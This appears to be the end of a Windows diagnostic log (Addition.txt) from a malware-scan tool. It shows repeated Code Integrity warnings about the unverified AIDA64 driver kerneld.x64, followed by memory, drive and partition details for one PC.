Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files (x86)\FinalWire\AIDA64 Extreme\kerneld.x64 because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-07-10 18:16:48.431 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files (x86)\FinalWire\AIDA64 Extreme\kerneld.x64 because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-07-10 18:16:48.380 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files (x86)\FinalWire\AIDA64 Extreme\kerneld.x64 because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-07-10 18:13:41.562 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files (x86)\FinalWire\AIDA64 Extreme\kerneld.x64 because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-07-10 18:13:41.512 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files (x86)\FinalWire\AIDA64 Extreme\kerneld.x64 because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-07-10 18:08:39.664 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files (x86)\FinalWire\AIDA64 Extreme\kerneld.x64 because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-07-10 18:08:39.604 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files (x86)\FinalWire\AIDA64 Extreme\kerneld.x64 because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Memory info =========================== Processor: Intel(R) Core(TM) i5-2310 CPU @ 2.90GHz Percentage of memory in use: 14% Total physical RAM: 8156.11 MB Available physical RAM: 7007.42 MB Total Virtual: 10202.3 MB Available Virtual: 8943.95 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:97.43 GB) (Free:62.83 GB) NTFS Drive g: () (Fixed) (Total:833.86 GB) (Free:447.83 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 00000000) Partition: GPT. ==================== End of Addition.txt ============================